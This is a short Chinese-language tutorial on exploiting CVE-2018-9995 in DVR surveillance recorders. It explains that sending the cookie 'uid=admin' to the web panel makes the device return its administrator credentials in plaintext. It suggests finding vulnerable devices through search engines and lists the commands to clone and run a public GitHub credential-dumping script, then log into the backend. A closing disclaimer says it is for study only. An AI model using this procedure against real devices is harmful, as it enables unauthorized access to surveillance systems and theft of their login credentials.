CVE-2018-9995 简单利用

漏洞描述

DVR，全称为Digital Video Recorder(硬盘录像机)，即数字视频录像机，相对于传统的模拟摄像录像机，采用硬盘录像，故常常被称为硬盘录像机，也被称为DVR。它是一套进行图像计算存储处理的计算机系统，具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能，DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身，用一台设备就能取代模拟监控系统一大堆设备的功能。

最初由阿根廷研究员发现，通过使用“Cookie： uid = admin”的Cookie标头来访问特定DVR的控制面板，DVR将以明文形式响应设备的管理员凭证。并且在GitHub发布了相关验证说明。

漏洞分析

类别：访问控制失效。访问DVR系列产品的WEB端时，设置如下cookie：uid=admin可绕过访问控制，获取设备内的用户名及登陆凭证。

利用搜索引擎搜索存在漏洞的版本

CVE利用
git clone 
https://github.com/ezelf/CVE-2018-9995_dvr_credentials
cd CVE-2018-9995_dvr_credentials
pip3 install -r requirements.txt
python3 getDVR_Credentials.py 

利用成功后获取账号密码，登入后台。

※ 此实验仅供大家学习参考,其他违法行为本人不负任何责任,在此申明!